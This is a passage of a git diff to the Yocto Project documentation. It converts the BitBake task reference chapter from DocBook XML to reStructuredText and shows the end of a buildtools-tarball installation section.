- On the machine that is able to run BitBake,
- be sure you have set up your build environment with
- the setup script
- (<link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>).
- </para></listitem>
- <listitem><para>
- Run the BitBake command to build the tarball:
- <literallayout class='monospaced'>
- $ bitbake buildtools-tarball
- </literallayout>
- or run the BitBake command to build the extended tarball:
- <literallayout class='monospaced'>
- $ bitbake buildtools-extended-tarball
- </literallayout>
- <note>
- The
- <link linkend='var-SDKMACHINE'><filename>SDKMACHINE</filename></link>
- variable in your <filename>local.conf</filename> file
- determines whether you build tools for a 32-bit
- or 64-bit system.
- </note>
- Once the build completes, you can find the
- <filename>.sh</filename> file that installs
- the tools in the <filename>tmp/deploy/sdk</filename>
- subdirectory of the
- <link linkend='build-directory'>Build Directory</link>.
- The installer file has the string "buildtools"
- (or "buildtools-extended") in the name.
- </para></listitem>
- <listitem><para>
- Transfer the <filename>.sh</filename> file from the
- build host to the machine that does not meet the
- Git, tar, or Python (or gcc) requirements.
- </para></listitem>
- <listitem><para>
- On the machine that does not meet the requirements,
- run the <filename>.sh</filename> file
- to install the tools.
- Here is an example for the traditional installer:
- <literallayout class='monospaced'>
- $ sh ~/Downloads/x86_64-buildtools-nativesdk-standalone-&DISTRO;.sh
- </literallayout>
- Here is an example for the extended installer:
- <literallayout class='monospaced'>
- $ sh ~/Downloads/x86_64-buildtools-extended-nativesdk-standalone-&DISTRO;.sh
- </literallayout>
- During execution, a prompt appears that allows you to
- choose the installation directory.
- For example, you could choose the following:
- <literallayout class='monospaced'>
- /home/<replaceable>your_username</replaceable>/buildtools
- </literallayout>
- </para></listitem>
- <listitem><para>
- Source the tools environment setup script by using a
- command like the following:
- <literallayout class='monospaced'>
- $ source /home/<replaceable>your_username</replaceable>/buildtools/environment-setup-x86_64-poky-linux
- </literallayout>
- Of course, you need to supply your installation directory and be
- sure to use the right file (i.e. i586 or x86_64).
- </para>
- <para>
- After you have sourced the setup script,
- the tools are added to <filename>PATH</filename>
- and any other environment variables required to run the
- tools are initialized.
- The results are working versions versions of Git, tar,
- Python and <filename>chrpath</filename>. And in the case of
- the <filename>buildtools-extended</filename> tarball, additional
- working versions of tools including <filename>gcc</filename>,
- <filename>make</filename> and the other tools included in
- <filename>packagegroup-core-buildessential</filename>.
- </para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-tasks.rst b/documentation/ref-manual/ref-tasks.rst
new file mode 100644
index 0000000000..2f1959a010
--- /dev/null
+++ b/documentation/ref-manual/ref-tasks.rst
@@ -0,0 +1,855 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*****
+Tasks
+*****
+
+Tasks are units of execution for BitBake. Recipes (``.bb`` files) use
+tasks to complete configuring, compiling, and packaging software. This
+chapter provides a reference of the tasks defined in the OpenEmbedded
+build system.
+
+Normal Recipe Build Tasks
+=========================
+
+The following sections describe normal tasks associated with building a
+recipe. For more information on tasks and dependencies, see the
+":ref:`Tasks <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:tasks>`" and
+":ref:`Dependencies <bitbake:bitbake-user-manual/bitbake-user-manual-execution:dependencies>`" sections in the
+BitBake User Manual.
+
+.. _ref-tasks-build:
+
+``do_build``
+------------
+
+The default task for all recipes. This task depends on all other normal
+tasks required to build a recipe.
+
+.. _ref-tasks-compile:
+
+``do_compile``
+--------------
+
+Compiles the source code. This task runs with the current working
+directory set to ``${``\ :term:`B`\ ``}``.
+
+The default behavior of this task is to run the ``oe_runmake`` function
+if a makefile (``Makefile``, ``makefile``, or ``GNUmakefile``) is found.
+If no such file is found, the ``do_compile`` task does nothing.
+
+.. _ref-tasks-compile_ptest_base:
+
+``do_compile_ptest_base``
+-------------------------
+
+Compiles the runtime test suite included in the software being built.
+
+.. _ref-tasks-configure:
+
+``do_configure``
+----------------
+
+Configures the source by enabling and disabling any build-time and
+configuration options for the software being built. The task runs with
+the current working directory set to ``${``\ :term:`B`\ ``}``.
+
+The default behavior of this task is to run ``oe_runmake clean`` if a
+makefile (``Makefile``, ``makefile``, or ``GNUmakefile``) is found and
+:term:`CLEANBROKEN` is not set to "1". If no such
+file is found or the ``CLEANBROKEN`` variable is set to "1", the
+``do_configure`` task does nothing.
+
+.. _ref-tasks-configure_ptest_base:
+
+``do_configure_ptest_base``
+---------------------------
+
+Configures the runtime test suite included in the software being built.
+
+.. _ref-tasks-deploy:
+
+``do_deploy``
+-------------
+
+Writes output files that are to be deployed to
+``${``\ :term:`DEPLOY_DIR_IMAGE`\ ``}``. The
+task runs with the current working directory set to
+``${``\ :term:`B`\ ``}``.
+
+Recipes implementing this task should inherit the
+:ref:`deploy <ref-classes-deploy>` class and should write the output
+to ``${``\ :term:`DEPLOYDIR`\ ``}``, which is not to be
+confused with ``${DEPLOY_DIR}``. The ``deploy`` class sets up
+``do_deploy`` as a shared state (sstate) task that can be accelerated
+through sstate use. The sstate mechanism takes care of copying the
+output from ``${DEPLOYDIR}`` to ``${DEPLOY_DIR_IMAGE}``.
+
+.. note::
+
+ Do not write the output directly to ``${DEPLOY_DIR_IMAGE}``, as this causes
+ the sstate mechanism to malfunction.
+
+The ``do_deploy`` task is not added as a task by default and
+consequently needs to be added manually. If you want the task to run
+after :ref:`ref-tasks-compile`, you can add it by doing
+the following:
+::
+
+ addtask deploy after do_compile
+
+Adding ``do_deploy`` after other tasks works the same way.
+
+.. note::
+
+ You do not need to add ``before do_build`` to the ``addtask`` command
+ (though it is harmless), because the ``base`` class contains the following:
+ ::
+
+ do_build[recrdeptask] += "do_deploy"
+
+
+ See the ":ref:`bitbake-user-manual/bitbake-user-manual-execution:dependencies`"
+ section in the BitBake User Manual for more information.
+
+If the ``do_deploy`` task re-executes, any previous output is removed
+(i.e. "cleaned").
+
+.. _ref-tasks-fetch:
+
+``do_fetch``
+------------
+
+Fetches the source code. This task uses the
+:term:`SRC_URI` variable and the argument's prefix to
+determine the correct :ref:`fetcher <bitbake:bb-fetchers>`
+module.
+
+.. _ref-tasks-image:
+
+``do_image``
+------------
+
+Starts the image generation process. The ``do_image`` task runs after
+the OpenEmbedded build system has run the
+:ref:`ref-tasks-rootfs` task during which packages are
+identified for installation into the image and the root filesystem is
+created, complete with post-processing.
+
+The ``do_image`` task performs pre-processing on the image through the
+:term:`IMAGE_PREPROCESS_COMMAND` and
+dynamically generates supporting ``do_image_*`` tasks as needed.
+
+For more information on image creation, see the ":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-image-complete:
+
+``do_image_complete``
+---------------------
+
+Completes the image generation process. The ``do_image_complete`` task
+runs after the OpenEmbedded build system has run the
+:ref:`ref-tasks-image` task during which image
+pre-processing occurs and through dynamically generated ``do_image_*``
+tasks the image is constructed.
+
+The ``do_image_complete`` task performs post-processing on the image
+through the
+:term:`IMAGE_POSTPROCESS_COMMAND`.
+
+For more information on image creation, see the
+":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-install:
+
+``do_install``
+--------------
+
+Copies files that are to be packaged into the holding area
+``${``\ :term:`D`\ ``}``. This task runs with the current
+working directory set to ``${``\ :term:`B`\ ``}``, which is the
+compilation directory. The ``do_install`` task, as well as other tasks
+that either directly or indirectly depend on the installed files (e.g.
+:ref:`ref-tasks-package`, ``do_package_write_*``, and
+:ref:`ref-tasks-rootfs`), run under
+:ref:`fakeroot <overview-manual/overview-manual-concepts:fakeroot and pseudo>`.
+
+.. note::
+
+ When installing files, be careful not to set the owner and group IDs
+ of the installed files to unintended values. Some methods of copying
+ files, notably when using the recursive ``cp`` command, can preserve
+ the UID and/or GID of the original file, which is usually not what
+ you want. The ``host-user-contaminated`` QA check checks for files
+ that probably have the wrong ownership.
+
+ Safe methods for installing files include the following:
+
+ - The ``install`` utility. This utility is the preferred method.
+
+ - The ``cp`` command with the "--no-preserve=ownership" option.
+
+ - The ``tar`` command with the "--no-same-owner" option. See the
+ ``bin_package.bbclass`` file in the ``meta/classes`` directory of
+ the :term:`Source Directory` for an example.
+
+.. _ref-tasks-install_ptest_base:
+
+``do_install_ptest_base``
+-------------------------
+
+Copies the runtime test suite files from the compilation directory to a
+holding area.
+
+.. _ref-tasks-package:
+
+``do_package``
+--------------
+
+Analyzes the content of the holding area
+``${``\ :term:`D`\ ``}`` and splits the content into subsets
+based on available packages and files. This task makes use of the
+:term:`PACKAGES` and :term:`FILES`
+variables.
+
+The ``do_package`` task, in conjunction with the
+:ref:`ref-tasks-packagedata` task, also saves some
+important package metadata. For additional information, see the
+:term:`PKGDESTWORK` variable and the
+":ref:`overview-manual/overview-manual-concepts:automatically added runtime dependencies`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_qa:
+
+``do_package_qa``
+-----------------
+
+Runs QA checks on packaged files. For more information on these checks,
+see the :ref:`insane <ref-classes-insane>` class.
+
+.. _ref-tasks-package_write_deb:
+
+``do_package_write_deb``
+------------------------
+
+Creates Debian packages (i.e. ``*.deb`` files) and places them in the
+``${``\ :term:`DEPLOY_DIR_DEB`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_write_ipk:
+
+``do_package_write_ipk``
+------------------------
+
+Creates IPK packages (i.e. ``*.ipk`` files) and places them in the
+``${``\ :term:`DEPLOY_DIR_IPK`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_write_rpm:
+
+``do_package_write_rpm``
+------------------------
+
+Creates RPM packages (i.e. ``*.rpm`` files) and places them in the
+``${``\ :term:`DEPLOY_DIR_RPM`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-package_write_tar:
+
+``do_package_write_tar``
+------------------------
+
+Creates tarballs and places them in the
+``${``\ :term:`DEPLOY_DIR_TAR`\ ``}`` directory in
+the package feeds area. For more information, see the
+":ref:`package-feeds-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual.
+
+.. _ref-tasks-packagedata:
+
+``do_packagedata``
+------------------
+
+Saves package metadata generated by the
+:ref:`ref-tasks-package` task in
+:term:`PKGDATA_DIR` to make it available globally.
+
+.. _ref-tasks-patch:
+
+``do_patch``
+------------
+
+Locates patch files and applies them to the source code.
+
+After fetching and unpacking source files, the build system uses the
+recipe's :term:`SRC_URI` statements
+to locate and apply patch files to the source code.
+
+.. note::
+
+ The build system uses the :term:`FILESPATH` variable to determine the
+ default set of directories when searching for patches.
+
+Patch files, by default, are ``*.patch`` and ``*.diff`` files created
+and kept in a subdirectory of the directory holding the recipe file. For
+example, consider the
+:yocto_git:`bluez5 </cgit/cgit.cgi/poky/tree/meta/recipes-connectivity/bluez5>`
+recipe from the OE-Core layer (i.e. ``poky/meta``):
+::
+
+ poky/meta/recipes-connectivity/bluez5
+
+This recipe has two patch files located here:
+::
+
+ poky/meta/recipes-connectivity/bluez5/bluez5
+
+In the ``bluez5`` recipe, the ``SRC_URI`` statements point to the source
+and patch files needed to build the package.
+
+.. note::
+
+ In the case for the ``bluez5_5.48.bb`` recipe, the ``SRC_URI`` statements
+ are from an include file ``bluez5.inc``.
+
+As mentioned earlier, the build system treats files whose file types are
+``.patch`` and ``.diff`` as patch files. However, you can use the
+"apply=yes" parameter with the ``SRC_URI`` statement to indicate any
+file as a patch file:
+::
+
+ SRC_URI = " \
+ git://path_to_repo/some_package \
+ file://file;apply=yes \
+ "
+
+Conversely, if you have a file whose file type is ``.patch`` or ``.diff``
+and you want to exclude it so that the ``do_patch`` task does not apply
+it during the patch phase, you can use the "apply=no" parameter with the
+:term:`SRC_URI` statement::
+
+ SRC_URI = " \
+ git://path_to_repo/some_package \
+ file://file1.patch \
+ file://file2.patch;apply=no \
+ "
+
+In the previous example ``file1.patch`` would be applied as a patch by default
+while ``file2.patch`` would not be applied.
+
+You can find out more about the patching process in the
+":ref:`patching-dev-environment`" section in
+the Yocto Project Overview and Concepts Manual and the
+":ref:`new-recipe-patching-code`" section in the
+Yocto Project Development Tasks Manual.
+
+.. _ref-tasks-populate_lic:
+
+``do_populate_lic``
+-------------------
+
+Writes license information for the recipe that is collected later when
+the image is constructed.
+
+.. _ref-tasks-populate_sdk:
+
+``do_populate_sdk``
+-------------------
+
+Creates the file and directory structure for an installable SDK. See the
+":ref:`sdk-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual for more
+information.
+
+.. _ref-tasks-populate_sdk_ext:
+
+``do_populate_sdk_ext``
+-----------------------
+
+Creates the file and directory structure for an installable extensible
+SDK (eSDK). See the ":ref:`sdk-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual for more
+information.
+
+
+.. _ref-tasks-populate_sysroot:
+
+``do_populate_sysroot``
+-----------------------
+
+Stages (copies) a subset of the files installed by the
+:ref:`ref-tasks-install` task into the appropriate
+sysroot. For information on how to access these files from other
+recipes, see the :term:`STAGING_DIR* <STAGING_DIR_HOST>` variables.
+Directories that would typically not be needed by other recipes at build
+time (e.g. ``/etc``) are not copied by default.
+
+For information on what directories are copied by default, see the
+:term:`SYSROOT_DIRS* <SYSROOT_DIRS>` variables. You can change
+these variables inside your recipe if you need to make additional (or
+fewer) directories available to other recipes at build time.
+
+The ``do_populate_sysroot`` task is a shared state (sstate) task, which
+means that the task can be accelerated through sstate use. Realize also
+that if the task is re-executed, any previous output is removed (i.e.
+"cleaned").
+
+.. _ref-tasks-prepare_recipe_sysroot:
+
+``do_prepare_recipe_sysroot``
+-----------------------------
+
+Installs the files into the individual recipe specific sysroots (i.e.
+``recipe-sysroot`` and ``recipe-sysroot-native`` under
+``${``\ :term:`WORKDIR`\ ``}`` based upon the
+dependencies specified by :term:`DEPENDS`). See the
+":ref:`staging <ref-classes-staging>`" class for more information.
+
+.. _ref-tasks-rm_work:
+
+``do_rm_work``
+--------------
+
+Removes work files after the OpenEmbedded build system has finished with
+them. You can learn more by looking at the
+":ref:`rm_work.bbclass <ref-classes-rm-work>`" section.
+
+.. _ref-tasks-unpack:
+
+``do_unpack``
+-------------
+
+Unpacks the source code into a working directory pointed to by
+``${``\ :term:`WORKDIR`\ ``}``. The :term:`S`
+variable also plays a role in where unpacked source files ultimately
+reside. For more information on how source files are unpacked, see the
+":ref:`source-fetching-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual and also see
+the ``WORKDIR`` and ``S`` variable descriptions.
+
+Manually Called Tasks
+=====================
+
+These tasks are typically manually triggered (e.g. by using the
+``bitbake -c`` command-line option):
+
+.. _ref-tasks-checkpkg:
+
+``do_checkpkg``
+---------------
+
+Provides information about the recipe including its upstream version and
+status. The upstream version and status reveals whether or not a version
+of the recipe exists upstream and a status of not updated, updated, or
+unknown.
+
+To check the upstream version and status of a recipe, use the following
+devtool commands:
+::
+
+ $ devtool latest-version
+ $ devtool check-upgrade-status
+
+See the ":ref:`ref-manual/ref-devtool-reference:\`\`devtool\`\` quick reference`"
+chapter for more information on
+``devtool``. See the ":ref:`devtool-checking-on-the-upgrade-status-of-a-recipe`"
+section for information on checking the upgrade status of a recipe.
+
+To build the ``checkpkg`` task, use the ``bitbake`` command with the
+"-c" option and task name:
+::
+
+ $ bitbake core-image-minimal -c checkpkg
+
+By default, the results are stored in :term:`$LOG_DIR <LOG_DIR>` (e.g.
+``$BUILD_DIR/tmp/log``).
+
+.. _ref-tasks-checkuri:
+
+``do_checkuri``
+---------------
+
+Validates the :term:`SRC_URI` value.
+
+.. _ref-tasks-clean:
+
+``do_clean``
+------------
+
+Removes all output files for a target from the
+:ref:`ref-tasks-unpack` task forward (i.e. ``do_unpack``,
+:ref:`ref-tasks-configure`,
+:ref:`ref-tasks-compile`,
+:ref:`ref-tasks-install`, and
+:ref:`ref-tasks-package`).
+
+You can run this task using BitBake as follows:
+::
+
+ $ bitbake -c clean recipe
+
+Running this task does not remove the
+:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>` cache files.
+Consequently, if no changes have been made and the recipe is rebuilt
+after cleaning, output files are simply restored from the sstate cache.
+If you want to remove the sstate cache files for the recipe, you need to
+use the :ref:`ref-tasks-cleansstate` task instead
+(i.e. ``bitbake -c cleansstate`` recipe).
+
+.. _ref-tasks-cleanall:
+
+``do_cleanall``
+---------------
+
+Removes all output files, shared state
+(:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`) cache, and
+downloaded source files for a target (i.e. the contents of
+:term:`DL_DIR`). Essentially, the ``do_cleanall`` task is
+identical to the :ref:`ref-tasks-cleansstate` task
+with the added removal of downloaded source files.
+
+You can run this task using BitBake as follows:
+::
+
+ $ bitbake -c cleanall recipe
+
+Typically, you would not normally use the ``cleanall`` task. Do so only
+if you want to start fresh with the :ref:`ref-tasks-fetch`
+task.
+
+.. _ref-tasks-cleansstate:
+
+``do_cleansstate``
+------------------
+
+Removes all output files and shared state
+(:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`) cache for a
+target. Essentially, the ``do_cleansstate`` task is identical to the
+:ref:`ref-tasks-clean` task with the added removal of
+shared state (:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`)
+cache.
+
+You can run this task using BitBake as follows:
+::
+
+ $ bitbake -c cleansstate recipe
+
+When you run the ``do_cleansstate`` task, the OpenEmbedded build system
+no longer uses any sstate. Consequently, building the recipe from
+scratch is guaranteed.
+
+.. note::
+
+ The ``do_cleansstate`` task cannot remove sstate from a remote sstate
+ mirror. If you need to build a target from scratch using remote mirrors, use
+ the "-f" option as follows:
+ ::
+
+ $ bitbake -f -c do_cleansstate target
+
+
+.. _ref-tasks-devpyshell:
+
+``do_devpyshell``
+-----------------
+
+Starts a shell in which an interactive Python interpreter allows you to
+interact with the BitBake build environment. From within this shell, you
+can directly examine and set bits from the data store and execute
+functions as if within the BitBake environment. See the ":ref:`platdev-appdev-devpyshell`" section in
+the Yocto Project Development Tasks Manual for more information about
+using ``devpyshell``.
+
+.. _ref-tasks-devshell:
+
+``do_devshell``
+---------------
+
+Starts a shell whose environment is set up for development, debugging,
+or both. See the ":ref:`platdev-appdev-devshell`" section in the
+Yocto Project Development Tasks Manual for more information about using
+``devshell``.
+
+.. _ref-tasks-listtasks:
+
+``do_listtasks``
+----------------
+
+Lists all defined tasks for a target.
+
+.. _ref-tasks-package_index:
+
+``do_package_index``
+--------------------
+
+Creates or updates the index in the :ref:`package-feeds-dev-environment` area.
+
+.. note::
+
+ This task is not triggered with the ``bitbake -c`` command-line option as
+ are the other tasks in this section. Because this task is specifically for
+ the ``package-index`` recipe, you run it using ``bitbake package-index``.
+
+Image-Related Tasks
+===================
+
+The following tasks are applicable to image recipes.
+
+.. _ref-tasks-bootimg:
+
+``do_bootimg``
+--------------
+
+Creates a bootable live image. See the
+:term:`IMAGE_FSTYPES` variable for additional
+information on live image types.
+
+.. _ref-tasks-bundle_initramfs:
+
+``do_bundle_initramfs``
+-----------------------
+
+Combines an initial RAM disk (initramfs) image and kernel together to
+form a single image. The
+:term:`CONFIG_INITRAMFS_SOURCE` variable
+has some more information about these types of images.
+
+.. _ref-tasks-rootfs:
+
+``do_rootfs``
+-------------
+
+Creates the root filesystem (file and directory structure) for an image.
+See the ":ref:`image-generation-dev-environment`"
+section in the Yocto Project Overview and Concepts Manual for more
+information on how the root filesystem is created.
+
+.. _ref-tasks-testimage:
+
+``do_testimage``
+----------------
+
+Boots an image and performs runtime tests within the image. For
+information on automatically testing images, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _ref-tasks-testimage_auto:
+
+``do_testimage_auto``
+---------------------
+
+Boots an image and performs runtime tests within the image immediately
+after it has been built. This task is enabled when you set
+:term:`TESTIMAGE_AUTO` equal to "1".
+
+For information on automatically testing images, see the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+Kernel-Related Tasks
+====================
+
+The following tasks are applicable to kernel recipes. Some of these
+tasks (e.g. the :ref:`ref-tasks-menuconfig` task) are
+also applicable to recipes that use Linux kernel style configuration
+such as the BusyBox recipe.
+
+.. _ref-tasks-compile_kernelmodules:
+
+``do_compile_kernelmodules``
+----------------------------
+
+Runs the step that builds the kernel modules (if needed). Building a
+kernel consists of two steps: 1) the kernel (``vmlinux``) is built, and
+2) the modules are built (i.e. ``make modules``).
+
+.. _ref-tasks-diffconfig:
+
+``do_diffconfig``
+-----------------
+
+When invoked by the user, this task creates a file containing the
+differences between the original config as produced by
+:ref:`ref-tasks-kernel_configme` task and the
+changes made by the user with other methods (i.e. using
+(:ref:`ref-tasks-kernel_menuconfig`). Once the
+file of differences is created, it can be used to create a config
+fragment that only contains the differences. You can invoke this task
+from the command line as follows:
+::
+
+ $ bitbake linux-yocto -c diffconfig
+
+For more information, see the
+":ref:`kernel-dev/kernel-dev-common:creating configuration fragments`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-tasks-kernel_checkout:
+
+``do_kernel_checkout``
+----------------------
+
+Converts the newly unpacked kernel source into a form with which the
+OpenEmbedded build system can work. Because the kernel source can be
+fetched in several different ways, the ``do_kernel_checkout`` task makes
+sure that subsequent tasks are given a clean working tree copy of the
+kernel with the correct branches checked out.
+
+.. _ref-tasks-kernel_configcheck:
+
+``do_kernel_configcheck``
+-------------------------
+
+Validates the configuration produced by the
+:ref:`ref-tasks-kernel_menuconfig` task. The
+``do_kernel_configcheck`` task produces warnings when a requested
+configuration does not appear in the final ``.config`` file or when you
+override a policy configuration in a hardware configuration fragment.
+You can run this task explicitly and view the output by using the
+following command:
+::
+
+ $ bitbake linux-yocto -c kernel_configcheck -f
+
+For more information, see the
+":ref:`kernel-dev/kernel-dev-common:validating configuration`"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-tasks-kernel_configme:
+
+``do_kernel_configme``
+----------------------
+
+After the kernel is patched by the :ref:`ref-tasks-patch`
+task, the ``do_kernel_configme`` task assembles and merges all the
+kernel config fragments into a merged configuration that can then be
+passed to the kernel configuration phase proper. This is also the time
+during which user-specified defconfigs are applied if present, and where
+configuration modes such as ``--allnoconfig`` are applied.
+
+.. _ref-tasks-kernel_menuconfig:
+
+``do_kernel_menuconfig``
+------------------------
+
+Invoked by the user to manipulate the ``.config`` file used to build a
+linux-yocto recipe. This task starts the Linux kernel configuration
+tool, which you then use to modify the kernel configuration.
+
+.. note::
+
+ You can also invoke this tool from the command line as follows:
+ ::
+
+ $ bitbake linux-yocto -c menuconfig
+
+
+See the ":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``"
+section in the Yocto Project Linux Kernel Development Manual for more
+information on this configuration tool.
+
+.. _ref-tasks-kernel_metadata:
+
+``do_kernel_metadata``
+----------------------
+
+Collects all the features required for a given kernel build, whether the
+features come from :term:`SRC_URI` or from Git
+repositories. After collection, the ``do_kernel_metadata`` task
+processes the features into a series of config fragments and patches,
+which can then be applied by subsequent tasks such as
+:ref:`ref-tasks-patch` and
+:ref:`ref-tasks-kernel_configme`.
+
+.. _ref-tasks-menuconfig:
+
+``do_menuconfig``
+-----------------
+
+Runs ``make menuconfig`` for the kernel. For information on
+``menuconfig``, see the
+":ref:`kernel-dev/kernel-dev-common:using \`\`menuconfig\`\``"
+section in the Yocto Project Linux Kernel Development Manual.
+
+.. _ref-tasks-savedefconfig:
+
+``do_savedefconfig``
+--------------------
+
+When invoked by the user, creates a defconfig file that can be used
+instead of the default defconfig. The saved defconfig contains the
+differences between the default defconfig and the changes made by the
+user using other methods (i.e. the
+:ref:`ref-tasks-kernel_menuconfig` task. You
+can invoke the task using the following command:
+::
+
+ $ bitbake linux-yocto -c savedefconfig
+
+.. _ref-tasks-shared_workdir:
+
+``do_shared_workdir``
+---------------------
+
+After the kernel has been compiled but before the kernel modules have
+been compiled, this task copies files required for module builds and
+which are generated from the kernel build into the shared work
+directory. With these copies successfully copied, the
+:ref:`ref-tasks-compile_kernelmodules` task
+can successfully build the kernel modules in the next step of the build.
+
+.. _ref-tasks-sizecheck:
+
+``do_sizecheck``
+----------------
+
+After the kernel has been built, this task checks the size of the
+stripped kernel image against
+:term:`KERNEL_IMAGE_MAXSIZE`. If that
+variable was set and the size of the stripped kernel exceeds that size,
+the kernel build produces a warning to that effect.
+
+.. _ref-tasks-strip:
+
+``do_strip``
+------------
+
+If ``KERNEL_IMAGE_STRIP_EXTRA_SECTIONS`` is defined, this task strips
+the sections named in that variable from ``vmlinux``. This stripping is
+typically used to remove nonessential sections such as ``.comment``
+sections from a size-sensitive configuration.
+
+.. _ref-tasks-validate_branches:
+
+``do_validate_branches``
+------------------------
+
+After the kernel is unpacked but before it is patched, this task makes
+sure that the machine and metadata branches as specified by the
+:term:`SRCREV` variables actually exist on the specified
+branches. If these branches do not exist and
+:term:`AUTOREV` is not being used, the
+``do_validate_branches`` task fails during the build.
+
+Miscellaneous Tasks
+===================
+
+The following sections describe miscellaneous tasks.
+
+.. _ref-tasks-spdx:
+
+``do_spdx``
+-----------
+
+A build stage that takes the source code and scans it on a remote
+FOSSOLOGY server in order to produce an SPDX document. This task applies
+only to the :ref:`spdx <ref-classes-spdx>` class.
diff --git a/documentation/ref-manual/ref-tasks.xml b/documentation/ref-manual/ref-tasks.xml
deleted file mode 100644
index 011e0d7496..0000000000
--- a/documentation/ref-manual/ref-tasks.xml
+++ /dev/null
@@ -1,1130 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-tasks'>
-<title>Tasks</title>
-
-<para>
- Tasks are units of execution for BitBake.
- Recipes (<filename>.bb</filename> files) use tasks to complete
- configuring, compiling, and packaging software.
- This chapter provides a reference of the tasks defined in the
- OpenEmbedded build system.
-</para>
-
-<section id='normal-recipe-build-tasks'>
- <title>Normal Recipe Build Tasks</title>
-
- <para>
- The following sections describe normal tasks associated with building
- a recipe.
- For more information on tasks and dependencies, see the
- "<ulink url='&YOCTO_DOCS_BB_URL;#tasks'>Tasks</ulink>" and
- "<ulink url='&YOCTO_DOCS_BB_URL;#dependencies'>Dependencies</ulink>"
- sections in the BitBake User Manual.
- </para>
-
- <section id='ref-tasks-build'>
- <title><filename>do_build</filename></title>
-
- <para>
- The default task for all recipes.
- This task depends on all other normal tasks
- required to build a recipe.
- </para>
- </section>
-
- <section id='ref-tasks-compile'>
- <title><filename>do_compile</filename></title>
-
- <para>
- Compiles the source code.
- This task runs with the current working directory set
- to
- <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>.
- </para>
-
- <para>
- The default behavior of this task is to run the
- <filename>oe_runmake</filename> function if a makefile
- (<filename>Makefile</filename>, <filename>makefile</filename>,
- or <filename>GNUmakefile</filename>) is found.
- If no such file is found, the <filename>do_compile</filename>
- task does nothing.
- </para>
- </section>
-
- <section id='ref-tasks-compile_ptest_base'>
- <title><filename>do_compile_ptest_base</filename></title>
-
- <para>
- Compiles the runtime test suite included in the software being
- built.
- </para>
- </section>
-
- <section id='ref-tasks-configure'>
- <title><filename>do_configure</filename></title>
-
- <para>
- Configures the source by enabling and disabling any build-time and
- configuration options for the software being built.
- The task runs with the current working directory set to
- <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>.
- </para>
-
- <para>
- The default behavior of this task is to run
- <filename>oe_runmake clean</filename> if a makefile
- (<filename>Makefile</filename>, <filename>makefile</filename>,
- or <filename>GNUmakefile</filename>) is found and
- <link linkend='var-CLEANBROKEN'><filename>CLEANBROKEN</filename></link>
- is not set to "1".
- If no such file is found or the <filename>CLEANBROKEN</filename>
- variable is set to "1", the <filename>do_configure</filename>
- task does nothing.
- </para>
- </section>
-
- <section id='ref-tasks-configure_ptest_base'>
- <title><filename>do_configure_ptest_base</filename></title>
-
- <para>
- Configures the runtime test suite included in the software being
- built.
- </para>
- </section>
-
- <section id='ref-tasks-deploy'>
- <title><filename>do_deploy</filename></title>
-
- <para>
- Writes output files that are to be deployed to
- <filename>${</filename><link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link><filename>}</filename>.
- The task runs with the current working directory set to
- <filename>${</filename><link linkend='var-B'><filename>B</filename></link><filename>}</filename>.
- </para>
-
- <para>
- Recipes implementing this task should inherit the
- <link linkend='ref-classes-deploy'><filename>deploy</filename></link>
- class and should write the output to
- <filename>${</filename><link linkend='var-DEPLOYDIR'><filename>DEPLOYDIR</filename></link><filename>}</filename>,
- which is not to be confused with <filename>${DEPLOY_DIR}</filename>.
- The <filename>deploy</filename> class sets up
- <filename>do_deploy</filename> as a shared state (sstate) task that
- can be accelerated through sstate use.
- The sstate mechanism takes care of copying the output from
- <filename>${DEPLOYDIR}</filename> to
- <filename>${DEPLOY_DIR_IMAGE}</filename>.
- <note>
- <title>Caution</title>
- Do not write the output directly to
- <filename>${DEPLOY_DIR_IMAGE}</filename>, as this causes
- the sstate mechanism to malfunction.
- </note>
- </para>
-
- <para>
- The <filename>do_deploy</filename> task is not added as a task
- by default and consequently needs to be added manually.
- If you want the task to run after
- <link linkend='ref-tasks-compile'><filename>do_compile</filename></link>,
- you can add it by doing the following:
- <literallayout class='monospaced'>
- addtask deploy after do_compile
- </literallayout>
- Adding <filename>do_deploy</filename> after other tasks works the
- same way.
- <note>
- You do not need to add <filename>before do_build</filename>
